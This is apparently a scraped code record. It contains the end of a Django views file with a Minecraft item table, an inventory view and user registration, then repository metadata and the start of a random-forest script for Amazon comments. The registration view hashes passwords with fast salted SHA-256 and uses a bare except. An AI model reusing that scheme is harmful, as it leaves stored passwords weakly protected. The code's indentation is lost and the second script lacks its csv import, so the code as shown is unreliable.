'Regeneration Potion (2:00)'}, '8200': {'class': 'at4 at_64', 'name': 'Weakness Potion (1:30)'}, '8225': {'class': 'at4 at_58', 'name': 'Regeneration Potion II (0:22)'}, 'ID': '373:16489', '16392': {'class': 'at4 at_77', 'name': 'Weakness Splash (1:07)'}, '16389': {'class': 'at4 at_75', 'name': 'Healing Splash'}, '8228': {'class': 'at4 at_61', 'name': 'Poison Potion II (0:22)'}, '16396': {'class': 'at4 at_80', 'name': 'Harming Splash'}, '16418': {'class': 'at4 at_72', 'name': 'Swiftness Splash II (1:07)'}}, 'wooden_slab': {'5': {'class': 'at2 at_1', 'name': 'Dark Oak Wood Slab'}, '2': {'class': 'at1 at_98', 'name': 'Birch-Wood Slab'}, '0': {'class': 'at1 at_96', 'name': 'Oak-Wood Slab'}, '3': {'class': 'at1 at_99', 'name': 'Jungle-Wood Slab'}, '4': {'class': 'at2', 'name': 'Acacia Wood Slab'}, '1': {'class': 'at1 at_97', 'name': 'Spruce-Wood Slab'}, 'ID': '126:5'}, 'fermented_spider_eye': {'0': {'class': 'at4 at_86', 'name': 'Fermented Spider Eye'}, 'ID': '376'}, 'rabbit': {'0': {'class': 'at5 at5_51', 'name': 'Raw Rabbit'}, 'ID': '411'}, 'melon_block': {'0': {'class': 'at1 at_73', 'name': 'Melon (Block)'}, 'ID': '103'}, 'portal': {'0': {'class': 'at1 at_44', 'name': 'Portal'}, 'ID': '90'}, 'boat': {'0': {'class': 'at3 at_98', 'name': 'Boat'}, 'ID': '333'}, 'magma_cream': {'0': {'class': 'at4 at_88', 'name': 'Magma Cream'}, 'ID': '378'}, 'flowing_water': {'0': {'class': 'at0 at_21', 'name': 'Water'}, 'ID': '8'}, 'air': {'0': {'class': '', 'name': 'No item'}, 'ID': '0'}, 'packed_ice': {'0': {'class': 'at2 at_98', 'name': 'Packed Ice'}, 'ID': '174'}, 'cobblestone': {'0': {'class': 'at0 at_10', 'name': 'Cobblestone'}, 'ID': '4'}, 'firework_charge': {'0': {'class': 'at5 at5_42', 'name': 'Firework Star'}, 'ID': '402'}, 'wall_banner': {'0': {'class': '', 'name': 'Wall Banner (Block)'}, 'ID': '177'}, 'brown_mushroom': {'0': {'class': 'at0 at_86', 'name': 'Brown Mushroom'}, 'ID': '39'}, 'reeds': {'0': {'class': 'at4 at_3', 'name': 'Sugar Cane'}, 'ID': '338'}, 'dropper': {'0': {'class': 'at2 at_33', 'name': 'Dropper'}, 'ID': '158'}, 'beacon': {'0': {'class': 'at2 at_13', 'name': 'Beacon'}, 'ID': '138'}, 'carrot': {'0': {'class': 'at5 at5_27', 'name': 'Carrot'}, 'ID': '391'}, 'red_mushroom_block': {'0': {'class': 'at1 at_70', 'name': 'Red Mushroom (Block)'}, 'ID': '100'}, 'potatoes': {'0': {'class': 'at2 at_18', 'name': 'Potatoes (Crop)'}, 'ID': '142'}, 'wooden_sword': {'0': {'class': 'at3 at_33', 'name': 'Wooden Sword'}, 'ID': '268'}, 'stonebrick': {'1': {'class': 'at1 at_67', 'name': 'Mossy Stone Bricks'}, '0': {'class': 'at1 at_66', 'name': 'Stone Bricks'}, 'ID': '98:3', '3': {'class': 'at1 at_69', 'name': 'Chiseled Stone Brick'}, '2': {'class': 'at1 at_68', 'name': 'Cracked Stone Bricks'}}, 'slimeball': {'0': {'class': 'at4 at_6', 'name': 'Slime Ball'}, 'ID': '341'}, 'planks': {'5': {'class': 'at1 at_95', 'name': 'Wooden Plank (Dark Oak)'}, '2': {'class': 'at0 at_12', 'name': 'Wooden Plank (Birch)'}, '0': {'class': 'at0 at_11', 'name': 'Wooden Plank (Oak)'}, '3': {'class': 'at0 at_13', 'name': 'Wooden Plank (Jungle)'}, '4': {'class': 'at1 at_94', 'name': 'Wooden Plank (Acacia)'}, '1': {'class': 'at0 at_22', 'name': 'Wooden Plank (Spruce)'}, 'ID': '5:5'}, 'flint': {'0': {'class': 'at3 at_83', 'name': 'Flint'}, 'ID': '318'}, 'apple': {'0': {'class': 'at3 at_24', 'name': 'Apple'}, 'ID': '260'}, 'wooden_button': {'0': {'class': 'at2 at_19', 'name': 'Button (Wood)'}, 'ID': '143'}, 'stone_axe': {'0': {'class': 'at3 at_40', 'name': 'Stone Axe'}, 'ID': '275'}, 'quartz_block': {'1': {'class': 'at2 at_29', 'name': 'Chiseled Quartz Block'}, '0': {'class': 'at2 at_28', 'name': 'Quartz Block'}, 'ID': '155:2', '2': {'class': 'at2 at_30', 'name': 'Pillar Quartz Block'}}, 'cooked_porkchop': {'0': {'class': 'at3 at_85', 'name': 'Cooked Porkchop'}, 'ID': '320'}, 'jungle_stairs': {'0': {'class': 'at2 at_11', 'name': 'Wooden Stairs (Jungle)'}, 'ID': '136'}, 'tnt_minecart': {'0': {'class': 'at5 at5_47', 'name': 'Minecart (TNT)'}, 'ID': '407'}, 'birch_fence_gate': {'0': {'class': 'at3 at_11', 'name': 'Fence Gate (Birch)'}, 'ID': '184'}, 'wooden_shovel': {'0': {'class': 'at3 at_34', 'name': 'Wooden Shovel'}, 'ID': '269'}, 'snow_layer': {'0': {'class': 'at1 at_32', 'name': 'Snow'}, 'ID': '78'}, 'spider_eye': {'0': {'class': 'at4 at_85', 'name': 'Spider Eye'}, 'ID': '375'}, 'ender_pearl': {'0': {'class': 'at4 at_52', 'name': 'Ender Pearl'}, 'ID': '368'}, 'lapis_block': {'0': {'class': 'at0 at_44', 'name': 'Lapis Lazuli Block'}, 'ID': '22'}, 'iron_ore': {'0': {'class': 'at0 at_28', 'name': 'Iron Ore'}, 'ID': '15'}, 'leaves': {'1': {'class': 'at0 at_37', 'name': 'Leaves (Spruce)'}, '0': {'class': 'at0 at_36', 'name': 'Leaves (Oak)'}, 'ID': '18:3', '3': {'class': 'at0 at_39', 'name': 'Leaves (Jungle)'}, '2': {'class': 'at0 at_38', 'name': 'Leaves (Birch)'}}, 'chainmail_helmet': {'0': {'class': 'at3 at_67', 'name': 'Chainmail Helmet'}, 'ID': '302'}, 'lead': {'0': {'class': 'at5 at5_60', 'name': 'Lead'}, 'ID': '420'}, 'record_ward': {'0': {'class': 'at5 at5_95', 'name': 'Music Disk (Ward)'}, 'ID': '2265'}, 'redstone_torch': {'0': {'class': 'at1 at_30', 'name': 'Redstone Torch'}, 'ID': '76'}, 'sponge': {'1': {'class': 'at0 at_41', 'name': 'Wet Sponge'}, '0': {'class': 'at0 at_40', 'name': 'Sponge'}, 'ID': '19:1'}, 'stained_glass_pane': {'2': {'class': 'at2 at_52', 'name': 'Stained Glass Pane (Magenta)'}, '0': {'class': 'at2 at_50', 'name': 'Stained Glass Pane (White)'}, '14': {'class': 'at2 at_64', 'name': 'Stained Glass Pane (Red)'}, '10': {'class': 'at2 at_60', 'name': 'Stained Glass Pane (Purple)'}, 'ID': '160:15', '12': {'class': 'at2 at_62', 'name': 'Stained Glass Pane (Brown)'}, '6': {'class': 'at2 at_56', 'name': 'Stained Glass Pane (Pink)'}, '11': {'class': 'at2 at_61', 'name': 'Stained Glass Pane (Blue)'}, '7': {'class': 'at2 at_57', 'name': 'Stained Glass Pane (Gray)'}, '5': {'class': 'at2 at_55', 'name': 'Stained Glass Pane (Lime)'}, '13': {'class': 'at2 at_63', 'name': 'Stained Glass Pane (Green)'}, '3': {'class': 'at2 at_53', 'name': 'Stained Glass Pane (Light Blue)'}, '8': {'class': 'at2 at_58', 'name': 'Stained Glass Pane (Light Gray)'}, '4': {'class': 'at2 at_54', 'name': 'Stained Glass Pane (Yellow)'}, '15': {'class': 'at2 at_65', 'name': 'Stained Glass Pane (Black)'}, '1': {'class': 'at2 at_51', 'name': 'Stained Glass Pane (Orange)'}, '9': {'class': 'at2 at_59', 'name': 'Stained Glass Pane (Cyan)'}}, 'piston': {'0': {'class': 'at0 at_58', 'name': 'Piston'}, 'ID': '33'}, 'iron_hoe': {'0': {'class': 'at3 at_57', 'name': 'Iron Hoe'}, 'ID': '292'}, 'wool': {'2': {'class': 'at0 at_62', 'name': 'Magenta Wool'}, '0': {'class': 'at0 at_60', 'name': 'Wool'}, '14': {'class': 'at0 at_74', 'name': 'Red Wool'}, '10': {'class': 'at0 at_70', 'name': 'Purple Wool'}, 'ID': '35:15', '12': {'class': 'at0 at_72', 'name': 'Brown Wool'}, '6': {'class': 'at0 at_66', 'name': 'Pink Wool'}, '11': {'class': 'at0 at_71', 'name': 'Blue Wool'}, '7': {'class': 'at0 at_67', 'name': 'Gray Wool'}, '5': {'class': 'at0 at_65', 'name': 'Lime Wool'}, '13': {'class': 'at0 at_73', 'name': 'Green Wool'}, '3': {'class': 'at0 at_63', 'name': 'Light Blue Wool'}, '8': {'class': 'at0 at_68', 'name': 'Light Gray Wool'}, '4': {'class': 'at0 at_64', 'name': 'Yellow Wool'}, '15': {'class': 'at0 at_75', 'name': 'Black Wool'}, '1': {'class': 'at0 at_61', 'name': 'Orange Wool'}, '9': {'class': 'at0 at_69', 'name': 'Cyan Wool'}}, 'banner': {'2': {'class': 'at5 at5_67', 'name': 'Banner (Green)'}, '0': {'class': 'at5 at5_65', 'name': 'Banner (Black)'}, '14': {'class': 'at5 at5_79', 'name': 'Banner (Orange)'}, '10': {'class': 'at5 at5_75', 'name': 'Banner (Lime)'}, 'ID': '425:15', '12': {'class': 'at5 at5_77', 'name': 'Banner (Light Blue)'}, '6': {'class': 'at5 at5_71', 'name': 'Banner (Cyan)'}, '11': {'class': 'at5 at5_76', 'name': 'Banner (Yellow)'}, '7': {'class': 'at5 at5_72', 'name': 'Banner (Light Gray)'}, '5': {'class': 'at5 at5_70', 'name': 'Banner (Purple)'}, '13': {'class': 'at5 at5_78', 'name': 'Banner (Magenta)'}, '3': {'class': 'at5 at5_68', 'name': 'Banner (Brown)'}, '8': {'class': 'at5 at5_73', 'name': 'Banner (Gray)'}, '4': {'class': 'at5 at5_69', 'name': 'Banner (Blue)'}, '15': {'class': 'at5 at5_80', 'name': 'Banner (White)'}, '1': {'class': 'at5 at5_66', 'name': 'Banner (Red)'}, '9': {'class': 'at5 at5_74', 'name': 'Banner (Pink)'}}, 'standing_banner': {'0': {'class': '', 'name': 'Standing Banner (Block)'}, 'ID': '176'}, 'iron_shovel': {'0': {'class': 'at3 at_20', 'name': 'Iron Shovel'}, 'ID': '256'}, 'ladder': {'0': {'class': 'at1 at_20', 'name': 'Ladder'}, 'ID': '65'}, 'redstone_ore': {'0': {'class': 'at1 at_27', 'name': 'Redstone Ore'}, 'ID': '73'}, 'spruce_door': {'0': {'class': 'at5 at5_81', 'name': 'Wooden Door (Spruce)'}, 'ID': '427'}, 'waterlily': {'0': {'class': 'at1 at_80', 'name': 'Lily Pad'}, 'ID': '111'}, 'jungle_fence': {'0': {'class': 'at3 at_17', 'name': 'Fence (Jungle)'}, 'ID': '190'}, 'enchanting_table': {'0': {'class': 'at1 at_85', 'name': 'Enchantment Table'}, 'ID': '116'}, 'unpowered_repeater': {'0': {'class': 'at1 at_47', 'name': 'Redstone Repeater (Block Off)'}, 'ID': '93'}, 'nether_brick_fence': {'0': {'class': 'at1 at_82', 'name': 'Nether Brick Fence'}, 'ID': '113'}, 'diamond_ore': {'0': {'class': 'at1 at_12', 'name': 'Diamond Ore'}, 'ID': '56'}, 'writable_book': {'0': {'class': 'at5 at5_22', 'name': 'Book and Quill'}, 'ID': '386'}, 'stone_pickaxe': {'0': {'class': 'at3 at_39', 'name': 'Stone Pickaxe'}, 'ID': '274'}, 'dispenser': {'0': {'class': 'at0 at_45', 'name': 'Dispenser'}, 'ID': '23'}, 'spruce_fence': {'0': {'class': 'at3 at_15', 'name': 'Fence (Spruce)'}, 'ID': '188'}, 'furnace': {'0': {'class': 'at1 at_17', 'name': 'Furnace'}, 'ID': '61'}, 'quartz_stairs': {'0': {'class': 'at2 at_31', 'name': 'Quartz Stairs'}, 'ID': '156'}, 'shears': {'0': {'class': 'at4 at_43', 'name': 'Shears'}, 'ID': '359'}, 'carpet': {'2': {'class': 'at2 at_82', 'name': 'Carpet (Magenta)'}, '0': {'class': 'at2 at_80', 'name': 'Carpet (White)'}, '14': {'class': 'at2 at_94', 'name': 'Carpet (Red)'}, '10': {'class': 'at2 at_90', 'name': 'Carpet (Purple)'}, 'ID': '171:15', '12': {'class': 'at2 at_92', 'name': 'Carpet (Brown)'}, '6': {'class': 'at2 at_86', 'name': 'Carpet (Pink)'}, '11': {'class': 'at2 at_91', 'name': 'Carpet (Blue)'}, '7': {'class': 'at2 at_87', 'name': 'Carpet (Grey)'}, '5': {'class': 'at2 at_85', 'name': 'Carpet (Lime)'}, '13': {'class': 'at2 at_93', 'name': 'Carpet (Green)'}, '3': {'class': 'at2 at_83', 'name': 'Carpet (Light Blue)'}, '8': {'class': 'at2 at_88', 'name': 'Carpet (Light Gray)'}, '4': {'class': 'at2 at_84', 'name': 'Carpet (Yellow)'}, '15': {'class': 'at2 at_95', 'name': 'Carpet (Black)'}, '1': {'class': 'at2 at_81', 'name': 'Carpet (Orange)'}, '9': {'class': 'at2 at_89', 'name': 'Carpet (Cyan)'}}, 'end_portal': {'0': {'class': 'at1 at_88', 'name': 'End Portal'}, 'ID': '119'}, 'netherrack': {'0': {'class': 'at1 at_41', 'name': 'Netherrack'}, 'ID': '87'}, 'record_mall': {'0': {'class': 'at5 at5_91', 'name': 'Music Disk (Mall)'}, 'ID': '2261'}, 'cooked_chicken': {'0': {'class': 'at4 at_50', 'name': 'Cooked Chicken'}, 'ID': '366'}, 'web': {'0': {'class': 'at0 at_54', 'name': 'Cobweb'}, 'ID': '30'}, 'snowball': {'0': {'class': 'at3 at_97', 'name': 'Snowball'}, 'ID': '332'}, 'powered_comparator': {'0': {'class': 'at5 at5_44', 'name': 'Redstone Comparator (On)'}, 'ID': '150'}, 'melon_seeds': {'0': {'class': 'at4 at_46', 'name': 'Melon Seeds'}, 'ID': '362'}, 'barrier': {'0': {'class': 'at2 at_73', 'name': 'Barrier'}, 'ID': '166'}, 'heavy_weighted_pressure_plate': {'0': {'class': 'at2 at_23', 'name': 'Weighted Pressure Plate (Heavy)'}, 'ID': '148'}, 'double_stone_slab': {'7': {'class': 'at2 at_28', 'name': 'Quartz Slab (Double)'}, '5': {'class': 'at1 at_66', 'name': 'Stone Brick Slab (Double)'}, '2': {'class': 'at0 at_11', 'name': 'Wooden Slab (Double)'}, '0': {'class': 'at0 at_90', 'name': 'Stone Slab (Double)'}, '3': {'class': 'at0 at_10', 'name': 'Cobblestone Slab (Double)'}, '8': {'class': 'at0 at_91', 'name': 'Smooth Stone Slab (Double)'}, '4': {'class': 'at1 at_1', 'name': 'Brick Slab (Double)'}, '1': {'class': 'at0 at_46', 'name': 'Sandstone Slab (Double)'}, '9': {'class': 'at0 at_92', 'name': 'Smooth Sandstone Slab (Double)'}, 'ID': '43:9', '6': {'class': 'at1 at_81', 'name': 'Nether Brick Slab (Double)'}}, 'spruce_stairs': {'0': {'class': 'at2 at_9', 'name': 'Wooden Stairs (Spruce)'}, 'ID': '134'}, 'golden_shovel': {'0': {'class': 'at3 at_49', 'name': 'Gold Shovel'}, 'ID': '284'}, 'trapped_chest': {'0': {'class': 'at2 at_21', 'name': 'Trapped Chest'}, 'ID': '146'}, 'repeater': {'0': {'class': 'at4 at_40', 'name': 'Redstone Repeater'}, 'ID': '356'}, 'coal': {'1': {'class': 'at3 at_28', 'name': 'Charcoal'}, '0': {'class': 'at3 at_27', 'name': 'Coal'}, 'ID': '263:1'}, 'rabbit_foot': {'0': {'class': 'at5 at5_54', 'name': "Rabbit's Foot"}, 'ID': '414'}, 'minecart': {'0': {'class': 'at3 at_93', 'name': 'Minecart'}, 'ID': '328'}, 'mob_spawner': {'0': {'class': 'at1 at_8', 'name': 'Mob Spawner'}, 'ID': '52'}, 'chest_minecart': {'0': {'class': 'at4 at_7', 'name': 'Minecart (Storage)'}, 'ID': '342'}, 'golden_helmet': {'0': {'class': 'at3 at_79', 'name': 'Gold Helmet'}, 'ID': '314'}, 'golden_carrot': {'0': {'class': 'at5 at5_32', 'name': 'Golden Carrot'}, 'ID': '396'}, 'red_sandstone': {'1': {'class': 'at3 at_6', 'name': 'Red Sandstone (Chiseled)'}, '0': {'class': 'at3 at_5', 'name': 'Red Sandstone'}, 'ID': '179:2', '2': {'class': 'at3 at_7', 'name': 'Red Sandstone (Smooth)'}}, 'ice': {'0': {'class': 'at1 at_33', 'name': 'Ice'}, 'ID': '79'}, 'end_portal_frame': {'0': {'class': 'at1 at_89', 'name': 'End Portal Frame'}, 'ID': '120'}, 'comparator': {'0': {'class': 'at5 at5_44', 'name': 'Redstone Comparator'}, 'ID': '404'}, 'birch_fence': {'0': {'class': 'at3 at_16', 'name': 'Fence (Birch)'}, 'ID': '189'}, 'activator_rail': {'0': {'class': 'at2 at_32', 'name': 'Rail (Activator)'}, 'ID': '157'}, 'cactus': {'0': {'class': 'at1 at_35', 'name': 'Cactus'}, 'ID': '81'}, 'double_stone_slab2': {'0': {'class': 'at3 at_5', 'name': 'Red Sandstone Slab (Double)'}, 'ID': '181'}, 'chicken': {'0': {'class': 'at4 at_49', 'name': 'Raw Chicken'}, 'ID': '365'}, 'tripwire': {'0': {'class': 'at2 at_7', 'name': 'Tripwire'}, 'ID': '132'}, 'emerald_block': {'0': {'class': 'at2 at_8', 'name': 'Block of Emerald'}, 'ID': '133'}, 'record_chirp': {'0': {'class': 'at5 at5_89', 'name': 'Music Disk (Chirp)'}, 'ID': '2259'}, 'feather': {'0': {'class': 'at3 at_53', 'name': 'Feather'}, 'ID': '288'}, 'porkchop': {'0': {'class': 'at3 at_84', 'name': 'Raw Porkchop'}, 'ID': '319'}, 'wheat': {'0': {'class': 'at3 at_61', 'name': 'Wheat'}, 'ID': '296'}, 'acacia_stairs': {'0': {'class': 'at2 at_70', 'name': 'Wooden Stairs (Acacia)'}, 'ID': '163'}, 'golden_boots': {'0': {'class': 'at3 at_82', 'name': 'Gold Boots'}, 'ID': '317'}, 'iron_helmet': {'0': {'class': 'at3 at_71', 'name': 'Iron Helmet'}, 'ID': '306'}, 'diamond_axe': {'0': {'class': 'at3 at_44', 'name': 'Diamond Axe'}, 'ID': '279'}, 'brown_mushroom_block': {'0': {'class': 'at1 at_70', 'name': 'Brown Mushroom (Block)'}, 'ID': '99'}, 'pumpkin_seeds': {'0': {'class': 'at4 at_45', 'name': 'Pumpkin Seeds'}, 'ID': '361'}, 'brewing_stand': {'0': {'class': 'at4 at_89', 'name': 'Brewing Stand'}, 'ID': '379'}, 'netherbrick': {'0': {'class': 'at5 at5_45', 'name': 'Nether Brick (Item)'}, 'ID': '405'}, 'hay_block': {'0': {'class': 'at2 at_79', 'name': 'Hay Bale'}, 'ID': '170'}, 'nether_brick_stairs': {'0': {'class': 'at1 at_83', 'name': 'Nether Brick Stairs'}, 'ID': '114'}, 'dirt': {'1': {'class': 'at0 at_8', 'name': 'Coarse Dirt'}, '0': {'class': 'at0 at_8', 'name': 'Dirt'}, 'ID': '3:2', '2': {'class': 'at0 at_9', 'name': 'Podzol'}}, 'prismarine_crystals': {'0': {'class': 'at5 at5_50', 'name': 'Prismarine Crystals'}, 'ID': '410'}, 'glowstone_dust': {'0': {'class': 'at4 at_13', 'name': 'Glowstone Dust'}, 'ID': '348'}, 'redstone_lamp': {'0': {'class': 'at1 at_92', 'name': 'Redstone Lamp'}, 'ID': '123'}, 'baked_potato': {'0': {'class': 'at5 at5_29', 'name': 'Baked Potato'}, 'ID': '393'}, 'gold_block': {'0': {'class': 'at0 at_88', 'name': 'Block of Gold'}, 'ID': '41'}, 'sapling': {'5': {'class': 'at0 at_19', 'name': 'Sapling (Dark Oak)'}, '2': {'class': 'at0 at_16', 'name': 'Sapling (Birch)'}, '0': {'class': 'at0 at_14', 'name': 'Sapling (Oak)'}, '3': {'class': 'at0 at_17', 'name': 'Sapling (Jungle)'}, '4': {'class': 'at0 at_18', 'name': 'Sapling (Acacia)'}, '1': {'class': 'at0 at_15', 'name': 'Sapling (Spruce)'}, 'ID': '6:5'}, 'piston_extension': {'0': {'class': '', 'name': 'Piston (Moving)'}, 'ID': '36'}, 'iron_axe': {'0': {'class': 'at3 at_22', 'name': 'Iron Axe'}, 'ID': '258'}, 'arrow': {'0': {'class': 'at3 at_26', 'name': 'Arrow'}, 'ID': '262'}, 'obsidian': {'0': {'class': 'at1 at_5', 'name': 'Obsidian'}, 'ID': '49'}, 'iron_chestplate': {'0': {'class': 'at3 at_72', 'name': 'Iron Chestplate'}, 'ID': '307'}, 'leather_helmet': {'0': {'class': 'at3 at_63', 'name': 'Leather Helmet'}, 'ID': '298'}, 'ghast_tear': {'0': {'class': 'at4 at_54', 'name': 'Ghast Tear'}, 'ID': '370'}, 'stone_slab': {'7': {'class': 'at1', 'name': 'Quartz Slab'}, '5': {'class': 'at0 at_98', 'name': 'Stone Brick Slab'}, '2': {'class': 'at0 at_95', 'name': 'Wooden Slab'}, '0': {'class': 'at0 at_93', 'name': 'Stone Slab'}, '3': {'class': 'at0 at_96', 'name': 'Cobblestone Slab'}, '4': {'class': 'at0 at_97', 'name': 'Brick Slab'}, '1': {'class': 'at0 at_94', 'name': 'Sandstone Slab'}, 'ID': '44:7', '6': {'class': 'at0 at_99', 'name': 'Nether Brick Slab'}}, 'golden_pickaxe': {'0': {'class': 'at3 at_50', 'name': 'Gold Pickaxe'}, 'ID': '285'}, 'record_cat': {'0': {'class': 'at5 at5_87', 'name': 'Music Disk (Cat)'}, 'ID': '2257'}, 'diamond_sword': {'0': {'class': 'at3 at_41', 'name': 'Diamond Sword'}, 'ID': '276'}, 'lit_redstone_lamp': {'0': {'class': 'at1 at_93', 'name': 'Redstone Lamp (On)'}, 'ID': '124'}, 'chainmail_leggings': {'0': {'class': 'at3 at_69', 'name': 'Chainmail Leggings'}, 'ID': '304'}, 'golden_hoe': {'0': {'class': 'at3 at_59', 'name': 'Gold Hoe'}, 'ID': '294'}, 'string': {'0': {'class': 'at3 at_52', 'name': 'String'}, 'ID': '287'}, 'diamond_block': {'0': {'class': 'at1 at_13', 'name': 'Block of Diamond'}, 'ID': '57'}, 'armor_stand': {'0': {'class': 'at5 at5_56', 'name': 'Armor Stand'}, 'ID': '416'}, 'yellow_flower': {'0': {'class': 'at0 at_76', 'name': 'Dandelion'}, 'ID': '37'}, 'clay': {'0': {'class': 'at1 at_36', 'name': 'Clay Block'}, 'ID': '82'}, 'water_bucket': {'0': {'class': 'at3 at_91', 'name': 'Bucket (Water)'}, 'ID': '326'}, 'cauldron': {'0': {'class': 'at4 at_90', 'name': 'Cauldron'}, 'ID': '380'}, 'ender_eye': {'0': {'class': 'at4 at_91', 'name': 'Eye of Ender'}, 'ID': '381'}, 'lit_pumpkin': {'0': {'class': 'at1 at_45', 'name': 'Jack-O-Lantern'}, 'ID': '91'}, 'gold_ore': {'0': {'class': 'at0 at_27', 'name': 'Gold Ore'}, 'ID': '14'}, 'redstone_block': {'0': {'class': 'at2 at_25', 'name': 'Block of Redstone'}, 'ID': '152'}, 'nether_wart': {'0': {'class': 'at4 at_56', 'name': 'Nether Wart Seeds'}, 'ID': '372'}, 'bookshelf': {'0': {'class': 'at1 at_3', 'name': 'Bookshelf'}, 'ID': '47'}, 'diamond_boots': {'0': {'class': 'at3 at_78', 'name': 'Diamond Boots'}, 'ID': '313'}, 'dragon_egg': {'0': {'class': 'at1 at_91', 'name': 'Dragon Egg'}, 'ID': '122'}, 'grass': {'0': {'class': 'at0 at_7', 'name': 'Grass'}, 'ID': '2'}, 'mushroom_stew': {'0': {'class': 'at3 at_47', 'name': 'Mushroom Stew'}, 'ID': '282'}, 'lit_furnace': {'0': {'class': 'at1 at_18', 'name': 'Furnace (Smelting)'}, 'ID': '62'}, 'lapis_ore': {'0': {'class': 'at0 at_43', 'name': 'Lapis Lazuli Ore'}, 'ID': '21'}, 'tripwire_hook': {'0': {'class': 'at2 at_6', 'name': 'Tripwire Hook'}, 'ID': '131'}, 'stone_hoe': {'0': {'class': 'at3 at_56', 'name': 'Stone Hoe'}, 'ID': '291'}, 'flower_pot': {'0': {'class': 'at5 at5_26', 'name': 'Flower Pot'}, 'ID': '390'}, 'light_weighted_pressure_plate': {'0': {'class': 'at2 at_22', 'name': 'Weighted Pressure Plate (Light)'}, 'ID': '147'}, 'melon_stem': {'0': {'class': 'at1 at_74', 'name': 'Melon Vine'}, 'ID': '105'}, 'glass_bottle': {'0': {'class': 'at4 at_84', 'name': 'Glass Bottle'}, 'ID': '374'}, 'painting': {'0': {'class': 'at3 at_86', 'name': 'Painting'}, 'ID': '321'}, 'bed': {'0': {'class': 'at4 at_39', 'name': 'Bed'}, 'ID': '355'}, 'cookie': {'0': {'class': 'at4 at_41', 'name': 'Cookie'}, 'ID': '357'}, 'speckled_melon': {'0': {'class': 'at4 at_92', 'name': 'Glistering Melon (Slice)'}, 'ID': '382'}, 'command_block_minecart': {'0': {'class': 'at5 at5_62', 'name': 'Minecart (Command Block)'}, 'ID': '422'}, 'filled_map': {'0': {'class': 'at4 at_42', 'name': 'Map'}, 'ID': '358'}, 'monster_egg': {'5': {'class': 'at1 at_69', 'name': 'Monster Egg (Chiseled Stone)'}, '2': {'class': 'at1 at_66', 'name': 'Monster Egg (Stone Brick)'}, '0': {'class': 'at0', 'name': 'Monster Egg (Stone)'}, '3': {'class': 'at1 at_67', 'name': 'Monster Egg (Mossy Stone Brick)'}, '4': {'class': 'at1 at_68', 'name': 'Monster Egg (Cracked Stone)'}, '1': {'class': 'at0 at_10', 'name': 'Monster Egg (Cobblestone)'}, 'ID': '97:5'}, 'blaze_powder': {'0': {'class': 'at4 at_87', 'name': 'Blaze Powder'}, 'ID': '377'}, 'lit_redstone_ore': {'0': {'class': 'at1 at_28', 'name': 'Redstone Ore (Glowing)'}, 'ID': '74'}, 'stone_stairs': {'0': {'class': 'at1 at_22', 'name': 'Cobblestone Stairs'}, 'ID': '67'}, 'sandstone_stairs': {'0': {'class': 'at2 at_3', 'name': 'Sandstone Stairs'}, 'ID': '128'}, 'leather_boots': {'0': {'class': 'at3 at_66', 'name': 'Leather Boots'}, 'ID': '301'}, 'diamond_helmet': {'0': {'class': 'at3 at_75', 'name': 'Diamond Helmet'}, 'ID': '310'}, 'diamond_leggings': {'0': {'class': 'at3 at_77', 'name': 'Diamond Leggings'}, 'ID': '312'}, 'hardened_clay': {'0': {'class': 'at2 at_96', 'name': 'Hardened Clay'}, 'ID': '172'}, 'birch_stairs': {'0': {'class': 'at2 at_10', 'name': 'Wooden Stairs (Birch)'}, 'ID': '135'}, 'red_mushroom': {'0': {'class': 'at0 at_87', 'name': 'Red Mushroom'}, 'ID': '40'}, 'brick_block': {'0': {'class': 'at1 at_1', 'name': 'Brick'}, 'ID': '45'}, 'wooden_pickaxe': {'0': {'class': 'at3 at_35', 'name': 'Wooden Pickaxe'}, 'ID': '270'}, 'record_blocks': {'0': {'class': 'at5 at5_88', 'name': 'Music Disk (Blocks)'}, 'ID': '2258'}, 'bone': {'0': {'class': 'at4 at_36', 'name': 'Bone'}, 'ID': '352'}, 'log': {'5': {'class': 'at0 at_35', 'name': 'Wood (Oak 5)'}, '2': {'class': 'at0 at_32', 'name': 'Wood (Birch)'}, '0': {'class': 'at0 at_30', 'name': 'Wood (Oak)'}, '3': {'class': 'at0 at_33', 'name': 'Wood (Jungle)'}, '4': {'class': 'at0 at_34', 'name': 'Wood (Oak 4)'}, '1': {'class': 'at0 at_31', 'name': 'Wood (Spruce)'}, 'ID': '17:5'}, 'item_frame': {'0': {'class': 'at5 at5_25', 'name': 'Item Frame'}, 'ID': '389'}, 'cake': {'0': {'class': 'at4 at_38', 'name': 'Cake'}, 'ID': '354'}}
inv = user.inv_survival.split(";")
inv_datas = []
for data in inv:
data = data.split(',')
inv_data = item.get(data[0].lower())
if inv_data == None:
inv_datas.append({'name': data[0]})
continue
if inv_data.get(data[2]) == None:
inv_datas.append(inv_data['0'])
continue
inv_datas.append(inv_data[data[2]])
return render(request, 'user/view.html', {'username': username, 'inv_datas': inv_datas})
def create(request):
data = {}
if request.method == 'POST':
form = CreateForm(request.POST)
data['form'] = form
if form.is_valid():
if form.cleaned_data['password'] == form.cleaned_data['password_']:
salt = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(15))
pw = sha256(bytes(form.cleaned_data['password'], encoding="ascii")).hexdigest()
pw = sha256(bytes(pw+salt, encoding="ascii")).hexdigest()
pw = "$"+"SHA"+"$"+salt+"$"+pw
try:
acc = Account.objects.create(
username=form.cleaned_data['username'],
password=pw,
email=form.cleaned_data['email'],
)
data['msg'] = "Register success !"
except:
data['msg'] = "Error, username or email was used"
else:
data['username'] = form.data['username']
data['email'] = form.data['email']
return render(request, 'user/create.html', data) | [
"theballkyo@gmail.com"
] | theballkyo@gmail.com |
0b2848f9370c62928edbdd57d699b64764f320c8 | 155724583d851f5ac06c5f89705d0b34dda54390 | /analisys/random_forest_classifier.py | 24b22fd2ae48b4fa1c06a8558a87f02a0b2efa51 | [
"MIT"
] | permissive | chavdim/amazon_comments | 76e420207d45ca1fe19450cf8f11e6cc1f8df8e5 | 609beb66b0efa9c0d5fbc1def5f32a6c43afb15f | refs/heads/master | 2020-06-17T01:24:44.620743 | 2017-02-23T07:00:43 | 2017-02-23T07:00:43 | 75,053,294 | 0 | 2 | null | 2017-01-31T05:41:25 | 2016-11-29T07:05:17 | Python | UTF-8 | Python | false | false | 2,250 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 20 20:15:06 2016
@author: chavdar
"""
from sklearn.ensemble import RandomForestClassifier
from sklearn.cross_validation import train_test_split
from sklearn.preprocessing import normalize
import numpy as np
d = str(30)
with open('train_top'+d+'.csv', 'r',encoding='utf8') as f:
my_list = []
reader = csv.reader(f)
for row in reader:
my_list.append(row)
